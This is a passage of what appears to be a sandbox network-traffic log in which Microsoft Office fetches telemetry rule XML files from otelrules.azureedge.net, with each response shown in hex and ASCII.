                                                                                                                                                                                              2024-11-24 12:39:31 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Sun, 24 Nov 2024 12:39:30 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 404
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                                                                                                                                                                                              ETag: "0x8DC582B95C61A3C"
                                                                                                                                                                                              x-ms-request-id: 33a5509c-101e-00a2-2819-3d9f2e000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241124T123930Z-178bfbc474b9xljthC1NYCtw9400000005tg00000000bcwx
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-24 12:39:31 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4d 6d 5d 5b 53 73 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120641" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <SR T="2" R="^([Mm][Ss][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              49192.168.2.64976013.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-24 12:39:30 UTC192OUTGET /rules/rule120642v0s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-24 12:39:31 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Sun, 24 Nov 2024 12:39:31 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 468
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:24 GMT
                                                                                                                                                                                              ETag: "0x8DC582BB046B576"
                                                                                                                                                                                              x-ms-request-id: 20e2cd06-701e-005c-2869-3bbb94000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241124T123931Z-178bfbc474bmqmgjhC1NYCy16c00000005xg00000000bm8n
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-24 12:39:31 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120642" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              50192.168.2.64976113.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-24 12:39:30 UTC192OUTGET /rules/rule120643v0s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-24 12:39:31 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Sun, 24 Nov 2024 12:39:31 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 400
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                                                                                                                                                              ETag: "0x8DC582BB2D62837"
                                                                                                                                                                                              x-ms-request-id: bdb50d09-801e-0048-2c0e-3ef3fb000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241124T123931Z-178bfbc474bpnd5vhC1NYC4vr4000000060g0000000040fm
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-24 12:39:31 UTC400INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4c 6c 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22
                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120643" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <SR T="2" R="^([Ll][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S T="


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              51192.168.2.64976213.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-24 12:39:31 UTC192OUTGET /rules/rule120644v0s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-24 12:39:31 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Sun, 24 Nov 2024 12:39:31 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 479
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                                                                                                                                                                              ETag: "0x8DC582BB7D702D0"
                                                                                                                                                                                              x-ms-request-id: a1d815ed-301e-0096-3f8c-3ae71d000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241124T123931Z-174c587ffdf6b487hC1TEBydsn00000004d0000000006z1y
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-24 12:39:31 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120644" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              52192.168.2.64976313.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-24 12:39:32 UTC192OUTGET /rules/rule120645v0s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-24 12:39:33 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Sun, 24 Nov 2024 12:39:33 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 425
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                                                                                                                                                                              ETag: "0x8DC582BBA25094F"
                                                                                                                                                                                              x-ms-request-id: ea4907c4-101e-0079-4064-3d5913000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241124T123933Z-174c587ffdftv9hphC1TEBm29w00000004e00000000039fb
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-24 12:39:33 UTC425INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 4d 6d 5d 5b 41 61 5d 5b 5a 7a 5d 5b 4f 6f 5d 5b 4e 6e 5d 20 5b 45 65 5d 5b 43 63 5d 32 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d
                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120645" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <SR T="2" R="([Aa][Mm][Aa][Zz][Oo][Nn] [Ee][Cc]2)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I=


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              53192.168.2.64976413.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-24 12:39:32 UTC192OUTGET /rules/rule120646v0s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-24 12:39:33 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Sun, 24 Nov 2024 12:39:33 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 475
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                                                                                                                                                              ETag: "0x8DC582BB2BE84FD"
                                                                                                                                                                                              x-ms-request-id: 8b9ec706-101e-000b-544c-3c5e5c000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241124T123933Z-15b8b599d88s6mj9hC1TEBur3000000004ag000000004bzf
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-24 12:39:33 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120646" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              54192.168.2.64976613.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-24 12:39:33 UTC192OUTGET /rules/rule120648v0s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-24 12:39:33 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Sun, 24 Nov 2024 12:39:33 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 491
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                              ETag: "0x8DC582B98B88612"
                                                                                                                                                                                              x-ms-request-id: af6ae163-c01e-0082-6735-3caf72000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241124T123933Z-178bfbc474bq2pr7hC1NYCkfgg000000060000000000bmyr
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-24 12:39:33 UTC491INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120648" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              55192.168.2.64976513.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-24 12:39:33 UTC192OUTGET /rules/rule120647v0s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-24 12:39:33 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Sun, 24 Nov 2024 12:39:33 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 448
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                                                                                              ETag: "0x8DC582BB389F49B"
                                                                                                                                                                                              x-ms-request-id: 2822332a-801e-002a-6c23-3d31dc000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241124T123933Z-178bfbc474bgvl54hC1NYCsfuw00000006000000000044rr
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-24 12:39:33 UTC448INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 50 70 5d 5b 41 61 5d 5b 43 63 5d 5b 48 68 5d 5b 45 65 5d 20 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e
                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120647" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <SR T="2" R="([Aa][Pp][Aa][Cc][Hh][Ee] [Ss][Oo][Ff][Tt][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR>


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              56192.168.2.64976713.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-24 12:39:33 UTC192OUTGET /rules/rule120649v0s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-24 12:39:33 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Sun, 24 Nov 2024 12:39:33 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 416
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:21 GMT
                                                                                                                                                                                              ETag: "0x8DC582BAEA4B445"
                                                                                                                                                                                              x-ms-request-id: f9d2b1a4-b01e-003d-337e-3bd32c000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241124T123933Z-174c587ffdfb485jhC1TEBmc1s000000046000000000gc6c
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-24 12:39:33 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 46 66 5d 5b 45 65 5d 5b 44 64 5d 5b 4f 6f 5d 5b 52 72 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120649" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <SR T="2" R="^([Ff][Ee][Dd][Oo][Rr][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              57192.168.2.64976813.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-24 12:39:35 UTC192OUTGET /rules/rule120650v0s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-24 12:39:35 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Sun, 24 Nov 2024 12:39:35 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 479
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                              ETag: "0x8DC582B989EE75B"
                                                                                                                                                                                              x-ms-request-id: fcdc764c-f01e-0052-4963-3b9224000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241124T123935Z-178bfbc474bnwsh4hC1NYC2ubs00000005z000000000aurr
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-24 12:39:35 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
